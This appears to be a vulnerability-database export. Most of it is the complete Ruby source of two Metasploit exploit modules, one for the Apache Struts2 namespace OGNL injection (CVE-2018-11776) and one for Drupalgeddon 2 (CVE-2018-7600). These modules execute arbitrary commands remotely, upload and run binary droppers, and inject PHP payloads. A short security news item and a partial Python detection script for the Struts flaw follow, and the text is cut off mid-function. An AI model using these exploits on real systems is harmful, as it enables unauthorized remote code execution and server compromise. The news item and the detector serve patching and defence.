# Private disclosure = 2018-04-10\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\n OptBool.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\n ]\n )\n register_advanced_options(\n [\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. 
Cannot contain spaces', 'GET' ]),\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\n ]\n )\n end\n\n def check\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\n\n resp = send_struts_request(ognl)\n\n # If vulnerable, the server should return an HTTP 302 (Redirect)\n # and the 'Location' header should contain either 'true' or 'false'\n if resp && resp.headers['Location']\n output = resp.headers['Location']\n vprint_status(\"Redirected to: #{output}\")\n if (output.include? '/true/')\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n elsif (output.include? '/false/')\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\n datastore['ENABLE_STATIC'] = true\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp && resp.code==400\n # METHOD 2: Generate two random numbers, ask the target to add them together.\n # If it does, it's vulnerable.\n a = rand(10000)\n b = rand(10000)\n c = a+b\n\n ognl = \"#{a}+#{b}\"\n\n resp = send_struts_request(ognl)\n\n if resp.headers['Location'].include? c.to_s\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp.nil?\n fail_with(Failure::Unreachable,\"Target did not respond. 
Please double check RHOSTS and RPORT\")\n end\n end\n\n def exploit\n case payload.arch.first\n when ARCH_CMD\n resp = execute_command(payload.encoded)\n else\n resp = send_payload()\n end\n end\n\n def encode_ognl(ognl)\n # Check and fail if the command contains the follow bad characters:\n # ';' seems to terminates the OGNL statement\n # '/' causes the target to return an HTTP/400 error\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\n # '\\r' ends the GET request prematurely\n # '\\n' ends the GET request prematurely\n\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\n bad_chars.each do |c|\n if ognl.include? c\n print_error(\"Bad OGNL request: #{ognl}\")\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\n end\n end\n\n # The following list of characters *must* be encoded or ORNL will asplode\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\n \" \": \"%20\",\n \"\\\"\":\"%22\",\n \"#\": \"%23\",\n \"'\": \"%27\",\n \"<\": \"%3c\",\n \">\": \"%3e\",\n \"?\": \"%3f\",\n \"^\": \"%5e\",\n \"`\": \"%60\",\n \"{\": \"%7b\",\n \"|\": \"%7c\",\n \"}\": \"%7d\",\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c%5c\", # Doesn't work. 
Anyone have a cool idea for a workaround?\n }\n\n encodable_chars.each do |k,v|\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\n ognl.gsub!(\"#{k}\",\"#{v}\")\n end\n return ognl\n end\n\n def send_struts_request(ognl, payload: nil, headers: nil)\n ognl = \"${#{ognl}}\"\n vprint_status(\"Submitted OGNL: #{ognl}\")\n ognl = encode_ognl(ognl)\n\n if headers.nil?\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\n end\n\n if payload\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\n headers[datastore['HEADER']] = payload\n end\n\n # TODO: Consider embedding OGNL in an HTTP header to hide it from the Tomcat logs\n uri = normalize_uri(target_uri.path, \"/#{ognl}/#{datastore['ACTION']}\")\n\n r = send_request_cgi(\n #'encode' => true, # this fails to encode '\\', which is a problem for me\n 'uri' => uri,\n 'method' => datastore['HTTPMethod'],\n 'headers' => headers\n )\n\n if r && r.code == 404\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\n end\n\n return r\n end\n\n def send_profile\n # Use OGNL to extract properties from the Java environment\n\n properties = { 'os.name': nil, # e.g. 'Linux'\n 'os.arch': nil, # e.g. 'amd64'\n 'os.version': nil, # e.g. '4.4.0-112-generic'\n 'user.name': nil, # e.g. 'root'\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\n 'user.language': nil, # e.g. 'en'\n #'java.io.tmpdir': nil, # e.g. 
'/usr/local/tomcat/temp' (didn't work in testing)\n }\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|('#{rand_text_alpha(2)}')|\n properties.each do |k,v|\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\n end\n ognl = ognl[0...-4]\n\n r = send_struts_request(ognl)\n\n if r.code == 400\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\n elsif r.headers['Location']\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\n # Extract the OGNL output from the Location path, and strip the two random chars\n s = r.headers['Location'].split('/')[1][2..-1]\n\n if s.nil?\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\n # But we didn't get any output, so we can't profile the target. Abort.\n return nil\n end\n\n # Confirm that all fields were returned, and non include extra (:) delimiters\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\n if s.count(':') > properties.length\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\n end\n\n # Separate the colon-delimited properties and store in the 'properties' hash\n s = s.split(':')\n i = 0\n properties.each do |k,v|\n properties[k] = s[i]\n i += 1\n end\n\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\n return properties\n else\n print_error(\"Failed to profile target. 
Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\n end\n end\n\n def profile_os\n # Probe for the target OS and architecture\n begin\n properties = send_profile()\n os = properties[:'os.name'].downcase\n rescue\n vprint_warning(\"Target profiling was unable to determine operating system\")\n os = ''\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\n end\n return os\n end\n\n def execute_command(cmd_input, opts={})\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\n if cmd_input.include? ';'\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\n end\n\n os = profile_os()\n\n if os && ((os.include? 'linux') || (os.include? 'nix'))\n cmd = \"{'sh','-c','#{cmd_input}'}\"\n elsif os && (os.include? 'win')\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\n else\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\n cmd = cmd_input\n end\n\n # The following OGNL will run arbitrary commands on Windows and Linux\n # targets, as well as returning STDOUT and STDERR. 
In my testing,\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\n\n vprint_status(\"Executing: #{cmd}\")\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\n ognl << %q|(#p.redirectErrorStream(true)).|\n ognl << %q|(#process=#p.start()).|\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\n ognl << %q|(#r.flush())|\n\n r = send_struts_request(ognl)\n\n if r && r.code == 200\n print_good(\"Command executed:\\n#{r.body}\")\n elsif r\n if r.body.length == 0\n print_status(\"Payload sent, but no output provided from server.\")\n elsif r.body.length > 0\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\n end\n end\n end\n\n def send_payload\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n payload = generate_payload_exe\n print_status(\"Generated #{payload.length} byte binary payload\")\n payload_b64 = [payload].pack(\"m\").delete(\"\\n\")\n\n if payload_b64.length < 8100\n send_payload_oneshot(payload_b64)\n else\n send_payload_multishot(payload)\n end\n end\n\n def send_payload_oneshot(payload)\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n random_filename = datastore['TEMPFILE']\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','.tmp')).|\n ognl << 
%q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n #TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|\n ognl << %q|(#s.close()).|\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n\n r = send_struts_request(ognl, payload: payload)\n\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\n print_good(\"Payload successfully dropped and executed.\")\n elsif r && r.headers['Location']\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n elsif r && r.code == 400\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\n end\n end\n\n def ognl_create_file()\n filename = datastore['TEMPFILE']\n\n # f = path to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@java.io.File@createTempFile('#(unknown)','.exe')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#f)|\n\n r = send_struts_request(ognl)\n\n begin\n tempfile = r.headers['Location']\n tempfile = tempfile[1..-(2+datastore['ACTION'].length)]\n if tempfile.empty?\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file on target. Try a cmd/*/generic payload\")\n end\n rescue\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file. 
Try a cmd/*/generic payload\")\n end\n\n return tempfile\n end\n\n def send_payload_multishot(payload)\n tempfile = ognl_create_file()\n print_status(\"Temp file created: #{tempfile}\")\n\n payload_cursor = 0\n\n while payload_cursor < payload.length\n payload_size = rand(4500..5000) # payload_size cannot exceed 5645 in my testing\n payload_start = payload_cursor\n payload_end = payload_cursor + payload_size\n payload_end = payload.size if payload_end > payload.size\n\n chunk_bin = payload[payload_start..payload_end]\n chunk_b64 = [chunk_bin].pack(\"m\").delete(\"\\n\")\n print_status(\"Sending payload chunk: #{chunk_b64.length} bytes\")\n ognl_append_file(tempfile, chunk_b64)\n\n payload_cursor = payload_end + 1\n end\n\n ognl_execute(tempfile)\n end\n\n def ognl_append_file(payload_file, payload_chunk)\n data_header = datastore['HEADER'] + 'd'\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{data_header}\": payload_chunk,\n \"#{file_header}\": payload_file,\n }\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f,1)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n ognl << %q|(#s.close()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.headers['Location'].include? 
success_string\n vprint_good(\"OGNL payload chunk sent successfully.\")\n return\n else\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload did not respond\")\n end\n rescue\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload failed\")\n end\n end\n\n def ognl_execute(file)\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{file_header}\": file,\n }\n\n # f = path to temp file\n # p = process handle\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#p=new java.lang.ProcessBuilder(#f)).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.code==302\n print_good(\"OGNL payload executed successfully.\")\n else\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n end\n rescue\n vprint_status(\"TARGET RESPONDED: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while attempting to execute the payload\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_namespace_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-13T16:59:05", "description": "This module exploits a Drupal property injection in the Forms API. 
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-18T00:05:45", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2023-04-04T09:24:09", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 
'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' 
=> {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [],\n 'Reliability' => [],\n 'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n 
execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 
'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n 
'_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "Ransomware raids aimed at specific targets with big pockets. Another Struts vulnerability -- but scarier than last year\u2019s. Android spyware that records your phone calls. These are some of the security news items that have caught our attention.\n\n### New Struts Bug Should Be Patched Yesterday\n\nApache patched a serious remote code execution vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) affecting all supported versions -- 2.3 to 2.3.34 and 2.5 to 2.5.16 -- of the widely used Struts Java application framework. The bug is considered more dangerous than the one disclosed last year in Struts that was exploited in the massive data breach at Equifax.\n\nIn the Apache [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-057>), the vulnerability is rated \u201cCritical\u201d and users are advised to immediately upgrade to Struts 2.3.35 or Struts 2.5.17.\n\nThe remote code execution becomes possible \u201cwhen using results with no namespace and in same time, its upper action(s) have no or wildcard namespace\u201d and \u201cwhen using url tag which doesn\u2019t have value and action set,\u201d the bulletin reads.\n\nOrganizations should upgrade to the patched Struts versions even if their applications aren\u2019t vulnerable to this bug. 
\u201cAn inadvertent change to a Struts configuration file may render the application vulnerable in the future,\u201d [stated](<https://semmle.com/news/apache-struts-CVE-2018-11776>) Semmle, whose security researcher Man Yue Mo discovered this vulnerability.\n\nUpgrading should take first priority, considering that Struts is widely used for public web apps, vulnerable systems are easy to identify, and the bug is easy to exploit, according to the company.\n\n\u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk,\u201d said Pavel Avgustinov, a Semmle VP.\n\nWriting in the Qualys blog, Product Management Director Jimmy Graham [noted](<https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776>) that the vulnerability does not exist with a default configuration of Struts, but that \u201cit does exist in commonly seen configurations for some Struts plugins.\u201d\n\n\u201cDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2,\u201d Graham wrote. 
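The bulletin's description of the vulnerable configuration quoted above, and the shape of the public PoC request, can both be checked mechanically. The Python below is an added example written for this page, not code from Qualys, Apache or Semmle: `audit_struts_xml` flags results that set no namespace inside a package that has no namespace or a wildcard namespace, and `is_s2_057_probe` flags request paths whose namespace segments contain an OGNL marker (`${` or `%{`), the pattern of the public PoC (`/${(111+111)}/actionChain1.action`). Assumptions: the result types checked (redirectAction, chain, postback) and the `struts.mapper.alwaysSelectFullNamespace` precondition come from my reading of the advisory, not from this page; the struts.xml and the request targets are constructed samples.

```python
"""S2-057 / CVE-2018-11776 checks, added example (not Apache, Semmle or Qualys code).

audit_struts_xml()  -> which results in a struts.xml inherit the request's namespace
is_s2_057_probe()   -> does a request path carry an OGNL marker in its namespace part
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Result types that take a "namespace" parameter and, when it is absent, reuse the
# namespace of the incoming request. ASSUMPTION of this example (my reading of the
# advisory); the page itself only says "results with no namespace".
NAMESPACE_RESULT_TYPES = {"redirectAction", "chain", "postback"}

# OGNL expression markers: ${...} and %{...}
OGNL_MARKER = re.compile(r"[$%]\{")


def always_select_full_namespace(xml_text):
    """True if struts.mapper.alwaysSelectFullNamespace is set to true (plugins such as
    Convention set it; ASSUMPTION: this precondition is from the advisory, not the page)."""
    root = ET.fromstring(xml_text)
    return any(
        c.get("name") == "struts.mapper.alwaysSelectFullNamespace"
        and c.get("value", "").strip().lower() == "true"
        for c in root.iter("constant")
    )


def audit_struts_xml(xml_text):
    """Return (package, action, result) triples for results of the types above that
    set no namespace param while their package has no namespace or a wildcard one."""
    root = ET.fromstring(xml_text)
    findings = []
    for pkg in root.iter("package"):
        namespace = pkg.get("namespace", "")
        if namespace and "*" not in namespace:
            continue  # a fixed namespace is used as-is; the request's is ignored
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                if result.get("type", "dispatcher") not in NAMESPACE_RESULT_TYPES:
                    continue
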